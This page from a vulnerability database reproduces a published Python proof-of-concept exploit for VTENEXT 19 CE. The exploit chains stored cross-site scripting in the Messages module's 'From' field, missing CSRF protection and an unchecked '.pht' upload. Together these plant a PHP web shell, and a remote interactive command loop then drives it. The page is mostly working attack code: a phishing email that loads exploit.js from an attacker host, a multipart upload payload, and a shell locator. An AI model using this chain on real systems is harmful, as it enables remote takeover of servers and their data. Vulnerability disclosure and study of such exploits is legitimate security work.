Lucene search

K

VTENEXT 19 CE Remote Code Execution

🗓️ 11 Sep 2020 00:00:00Reported by Marco RuelaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 513 Views

VTENEXT 19 CE - Remote Code Execution vulnerability disclosed and exploited through XSS, File Upload, and CSRF weaknesses. Scripted exploit sends mail and runs commands

Show more
Related
Code
ReporterTitlePublishedViews
Family
Exploit DB
VTENEXT 19 CE - Remote Code Execution
11 Sep 202000:00
exploitdb
Prion
Cross site scripting
14 Sep 202020:15
prion
Prion
Cross site request forgery (csrf)
14 Sep 202020:15
prion
Prion
Unrestricted file upload
14 Sep 202020:15
prion
Cvelist
CVE-2020-10227
14 Sep 202019:58
cvelist
Cvelist
CVE-2020-10229
14 Sep 202019:55
cvelist
Cvelist
CVE-2020-10228
14 Sep 202019:56
cvelist
NVD
CVE-2020-10227
14 Sep 202020:15
nvd
NVD
CVE-2020-10229
14 Sep 202020:15
nvd
NVD
CVE-2020-10228
14 Sep 202020:15
nvd
Rows per page
`#!/usr/bin/python3  
  
# Exploit Title: VTENEXT 19 CE - Remote Code Execution  
# Google Dork: n/a  
# Date: 2020/09/09  
# Exploit Author: Marco Ruela  
# Vendor Homepage: https://www.vtenext.com/en/  
# Software Link: Vendor removed vulnerable version from sourceforge.net  
# Version: 19 CE  
# Tested on: Ubuntu 16.04  
# CVE : N/A  
  
# 2020/03/07 - Disclosed vulnerabilities to vendor  
# 2020/03/10 - Vendor committed to fix  
# 2020/09/09 - Public disclosure  
  
# This script should be easy enough to follow.  
# We string together the three vulnerabilities to get RCE.  
  
# XSS - The "From" field of the VTENEXT Messages module is vulnerable.  
# File Upload - File extensions are checked against a $upload_badext in the config file, .pht extensions are allowed and executable by default .  
# CSRF - No CSRF protections in place.  
  
# exploit.js needs to be hosted somewhere, IP's need to be replaced   
# check_csrf() should be changed based on your setup  
# run_shell() is a "nice to have"  
  
  
# content of exploit.js  
"""  
function insertImage() {  
var xhr = new XMLHttpRequest();  
xhr.open('POST','http://192.168.226.168/vtenext19ce/index.php?module=Myfiles&action=MyfilesAjax&file=UploadFile&folderid=&uniqueid=',true);  
xhr.setRequestHeader('Content-type','multipart/form-data; boundary=---------------------------rekt');  
xhr.setRequestHeader('Content-Length', '248');  
xhr.setRequestHeader('Referer', 'http://172.16.233.146/vtenext19ce/index.php');  
xhr.withCredentials = true;  
var body = '-----------------------------rekt\nContent-Disposition: form-data; name="file_0"; filename="shell.pht"\nContent-Type: text/text\n\n<?php system($_GET[\'x\']); ?>\n\n-----------------------------rekt--';  
  
var aBody = new Uint8Array(body.length);  
for (var i = 0; i < aBody.length; i++)  
aBody[i] = body.charCodeAt(i);  
xhr.send(new Blob([aBody]));  
}  
  
insertImage();  
"""  
  
import smtplib  
import datetime  
import requests  
import os  
import time  
  
base_url = "http://192.168.226.168/vtenext19ce/"  
  
print("[*] CVE-2020-10227, CVE-2020-10228, CVE-2020-10229 - POC")  
  
  
def build_url():  
d = datetime.datetime.today()  
year = str(d.year)  
month = str(d.strftime("%B"))  
week = "week" + str(d.isocalendar()[1] - d.replace(day=1).isocalendar()[1])  
tmp = base_url + "storage/home/1/" + year + "/" + month + "/" + week + "/"  
return(tmp)  
  
def build_mail():  
_from = """'<script src="http://192.168.226.1/exploit.js" onerror=alert(1) >'"""  
_to = "[email protected]"  
_subject = "Important!"  
_body = "While you're reading this, a file is being uploaded to this server."   
  
msg = "From: " + _from + "\n"  
msg += "To: " + _to + "\n"  
msg += "Subject: " + _subject + "\n\n"  
msg += _body  
return msg  
  
def send_mail():  
msg = build_mail()  
smtp_server = '192.168.226.167'  
smtp_port = 25  
  
sender = '[email protected]'  
receiver = '[email protected]'  
  
server = smtplib.SMTP(smtp_server, smtp_port)  
server.sendmail(sender, receiver, msg)  
  
def check_csrf():  
while True:  
is_there = os.popen('tail -n1 /var/log/apache2/access.log').read()  
  
if "200" in is_there and "/exploit.js" in is_there and base_url in is_there:  
print("[>] CSRF triggered")  
break  
else:  
time.sleep(0.5)  
continue  
  
  
def find_shell():  
print("[>] Locating shell")  
time.sleep(1)  
tmp1 = build_url()  
for i in range(1, 9999):  
url = tmp1 + str(i) + "_shell.pht"   
r = requests.get(url)  
if r.status_code == 200:  
print("[>] Found the shell")  
print("[-] Location: " + url)  
return url  
else:  
continue   
  
def run_shell(x):  
print("\n")  
while True:  
cmd = input("shell> ")  
if cmd == "exit":  
break  
else:  
url = x + "?x=" + cmd  
r = requests.get(url)  
print(r.text)  
  
  
print("[>] Sending email")  
send_mail()  
  
print("[-] Waiting for user to open mail")  
  
check_csrf()  
  
shell_location = find_shell()  
  
run_shell(shell_location)  
  
  
print("[!] Done!")  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo